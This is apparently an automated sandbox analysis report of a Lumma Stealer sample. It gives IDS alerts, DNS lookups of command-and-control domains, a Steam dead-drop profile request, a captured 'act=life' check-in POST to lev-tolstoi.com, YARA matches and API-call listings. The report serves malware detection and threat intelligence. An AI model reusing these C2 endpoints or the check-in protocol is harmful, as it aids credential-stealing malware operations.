2024-12-23T08:38:16.468783+0100 | 2058370 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) | 1 | 192.168.2.5 | 54052 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:16.889637+0100 | 2058362 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) | 1 | 192.168.2.5 | 54190 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:17.278115+0100 | 2058354 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) | 1 | 192.168.2.5 | 55509 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:17.503964+0100 | 2058376 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) | 1 | 192.168.2.5 | 55784 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:17.728617+0100 | 2058374 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) | 1 | 192.168.2.5 | 50156 | 1.1.1.1 | 53 | UDP
2024-12-23T08:38:19.493066+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T08:38:20.398145+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-23T08:38:22.062968+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T08:38:22.798773+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T08:38:22.798773+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-23T08:38:23.761720+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Dec 23, 2024 08:38:15.793340921 CET | 49854       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:16.015830994 CET | 53          | 49854     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:16.020159960 CET | 62727       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:16.237737894 CET | 53          | 62727     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:16.241364956 CET | 59334       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:16.460222006 CET | 53          | 59334     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:16.468782902 CET | 54052       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:16.859289885 CET | 53          | 54052     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:16.889636993 CET | 54190       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:17.276228905 CET | 53          | 54190     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:17.278115034 CET | 55509       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:17.500688076 CET | 53          | 55509     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:17.503963947 CET | 55784       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:17.723517895 CET | 53          | 55784     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:17.728616953 CET | 50156       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:17.951376915 CET | 53          | 50156     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:17.954493999 CET | 55191       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:18.091398001 CET | 53          | 55191     | 1.1.1.1     | 192.168.2.5
Dec 23, 2024 08:38:20.617142916 CET | 62354       | 53        | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:38:20.842283010 CET | 53          | 62354     | 1.1.1.1     | 192.168.2.5
Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name               | Type           | Class       | DNS over HTTPS
Dec 23, 2024 08:38:15.793340921 CET | 192.168.2.5 | 1.1.1.1 | 0x4889   | Standard query (0) | crosshuaht.lat     | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.020159960 CET | 192.168.2.5 | 1.1.1.1 | 0x3c6a   | Standard query (0) | grannyejh.lat      | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.241364956 CET | 192.168.2.5 | 1.1.1.1 | 0xbf87   | Standard query (0) | discokeyus.lat     | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.468782902 CET | 192.168.2.5 | 1.1.1.1 | 0x7c90   | Standard query (0) | necklacebudi.lat   | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.889636993 CET | 192.168.2.5 | 1.1.1.1 | 0xb69a   | Standard query (0) | energyaffai.lat    | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.278115034 CET | 192.168.2.5 | 1.1.1.1 | 0x3790   | Standard query (0) | aspecteirs.lat     | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.503963947 CET | 192.168.2.5 | 1.1.1.1 | 0x2292   | Standard query (0) | sustainskelet.lat  | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.728616953 CET | 192.168.2.5 | 1.1.1.1 | 0xe3b7   | Standard query (0) | rapeflowwj.lat     | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.954493999 CET | 192.168.2.5 | 1.1.1.1 | 0x4403   | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:20.617142916 CET | 192.168.2.5 | 1.1.1.1 | 0x9352   | Standard query (0) | lev-tolstoi.com    | A (IP address) | IN (0x0001) | false
Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code     | Name               | CName | Address        | Type           | Class       | DNS over HTTPS
Dec 23, 2024 08:38:16.015830994 CET | 1.1.1.1   | 192.168.2.5 | 0x4889   | Name error (3) | crosshuaht.lat     | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.237737894 CET | 1.1.1.1   | 192.168.2.5 | 0x3c6a   | Name error (3) | grannyejh.lat      | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.460222006 CET | 1.1.1.1   | 192.168.2.5 | 0xbf87   | Name error (3) | discokeyus.lat     | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:16.859289885 CET | 1.1.1.1   | 192.168.2.5 | 0x7c90   | Name error (3) | necklacebudi.lat   | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.276228905 CET | 1.1.1.1   | 192.168.2.5 | 0xb69a   | Name error (3) | energyaffai.lat    | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.500688076 CET | 1.1.1.1   | 192.168.2.5 | 0x3790   | Name error (3) | aspecteirs.lat     | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.723517895 CET | 1.1.1.1   | 192.168.2.5 | 0x2292   | Name error (3) | sustainskelet.lat  | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:17.951376915 CET | 1.1.1.1   | 192.168.2.5 | 0xe3b7   | Name error (3) | rapeflowwj.lat     | none  | none           | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:18.091398001 CET | 1.1.1.1   | 192.168.2.5 | 0x4403   | No error (0)   | steamcommunity.com |       | 23.55.153.106  | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:20.842283010 CET | 1.1.1.1   | 192.168.2.5 | 0x9352   | No error (0)   | lev-tolstoi.com    |       | 104.21.66.86   | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:20.842283010 CET | 1.1.1.1   | 192.168.2.5 | 0x9352   | No error (0)   | lev-tolstoi.com    |       | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.5 | 49704       | 23.55.153.106  | 443              | 6720 | C:\Users\user\Desktop\HK8IIasL9i.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:19 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-12-23 07:38:20 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Mon, 23 Dec 2024 07:38:20 GMT
    Content-Length: 35121
    Connection: close
    Set-Cookie: sessionid=355ae53a3900853509b7ceaa; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-23 07:38:20 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 07:38:20 UTC | 10097 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-23 07:38:20 UTC | 10545 | IN | Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.5 | 49705       | 104.21.66.86   | 443              | 6720 | C:\Users\user\Desktop\HK8IIasL9i.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:22 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
2024-12-23 07:38:22 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-12-23 07:38:22 UTC | 1129 | IN | HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:38:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=u97340kie2m840aqalpa5d3sf0; expires=Fri, 18 Apr 2025 01:25:01 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sxo04tQaRrTIYq1JutzK6Y45W%2FOOT9HqjPCeAzI6%2FxbeYdYqeNoQCuTYVwNgq4%2B%2FZBWNEkfrIQ%2FL8MW2wjjOImbfa2Dt0PE%2BCePr4hlcDLmWcoNSE4slLxpAyogW7nPBrXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                      CF-RAY: 8f66b1118a498c4d-EWR
                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1612368&cwnd=158&unsent_bytes=0&cid=fa74bfadbd00fe3a&ts=749&x=0"
2024-12-23 07:38:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 07:38:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                      Start time:02:38:13
                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\HK8IIasL9i.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\HK8IIasL9i.exe"
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      File size:295'424 bytes
                                                                                                                                                                                                                                                      MD5 hash:7DC18A69DCDCA002579BFDE5D5427FF2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                      Start time:02:38:23
                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 1728
                                                                                                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:1.5%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:33%
                                                                                                                                                                                                                                                        Signature Coverage:36.4%
                                                                                                                                                                                                                                                        Total number of Nodes:88
                                                                                                                                                                                                                                                        Total number of Limit Nodes:7

Control-flow Graph (function starting at 0040ACF0; graph node and edge data omitted)
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                                                                                                                                                                                                                                        • API String ID: 0-2986092683
                                                                                                                                                                                                                                                        • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                        • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

Control-flow Graph (function starting at 00408850; graph node and edge data omitted)
APIs
• GetCurrentProcessId.KERNEL32 ref: 0040891C
• GetCurrentThreadId.KERNEL32 ref: 00408925
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
• GetForegroundWindow.USER32 ref: 00408A33
  • Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
  • Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7
• ExitProcess.KERNEL32 ref: 00408AD1
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
• String ID:
• API String ID: 3072701918-0
• Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
• Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
• Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Control-flow Graph
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004707CE
• Module32First.KERNEL32(00000000,00000224), ref: 004707EE
Memory Dump Source
• Source File: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_470000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 5595ceff43f7b3773f2b5f76221f31d5ab95906f67ec572e80d6a2261ca759b8
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: B6F0C231102310ABD7203AB5988CAAFB7ECAF49725F10852AE64A911C0DA78F8054A64

Control-flow Graph
APIs
• LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
• Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: ,+*)
• API String ID: 0-3529585375
• Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
• Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
• Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
• Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: o`
• API String ID: 0-3993896143
• Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
• Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
• Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
• Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0073024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: adef7a5cbd920eb9168ed7290e46249576032640bd78cd8557e12777c8e80788
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 7A527974A00229DFDB64CF68C994BA8BBB1BF09304F1480D9E50DAB352DB34AE95DF54

Control-flow Graph
control_flow_graph 202 730e0f-730e24 SetErrorMode * 2 203 730e26 202->203 204 730e2b-730e2c 202->204 203->204
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,00730223,?,?), ref: 00730E19
• SetErrorMode.KERNELBASE(00000000,?,?,00730223,?,?), ref: 00730E1E
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 8ac00d33d73c15a558b5e8251d4a1b50dc3861c956267a4a53638a43432616dc
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 83D0123124512C77D7003A94DC09BCD7B1CDF05B62F008411FB0DD9081C774994046E5

Control-flow Graph
control_flow_graph 205 40e71a-40e738 CoUninitialize * 2
APIs
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: Uninitialize
• String ID:
• API String ID: 3861434553-0
• Opcode ID: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
• Instruction ID: 47d587ad0eb400b5f6ee0cc7c77a8a39c50d7b10eba8d8677ba26603a35f3bb5
• Opcode Fuzzy Hash: bd4e50c2cf2632c146e6dc99e67d996af78d75fcb2eac0acec7d90a27868b704
• Instruction Fuzzy Hash: 10C04CFDA85141EFD384CF24EC5A4157725AB866873000535F913C2370CA6065818A0C

Control-flow Graph
control_flow_graph 206 43c2c8-43c2d6 207 43c2e0-43c2fd 206->207 207->207 208 43c2ff-43ccb9 GetForegroundWindow call 43e110 207->208 211 43ccbe-43ccdf 208->211
APIs
• GetForegroundWindow.USER32 ref: 0043CCAF
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
• Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
• Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
• Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Control-flow Graph
control_flow_graph 212 40c550-40c580 CoInitializeEx
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
• Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
• Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
• Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Control-flow Graph
control_flow_graph 213 40c583-40c5b2 CoInitializeSecurity
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
• Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
• Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
• Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 215 43aaa0-43aaac 216 43aab3-43aabe call 43d810 RtlFreeHeap 215->216 217 43aac4-43aac5 215->217 216->217
APIs
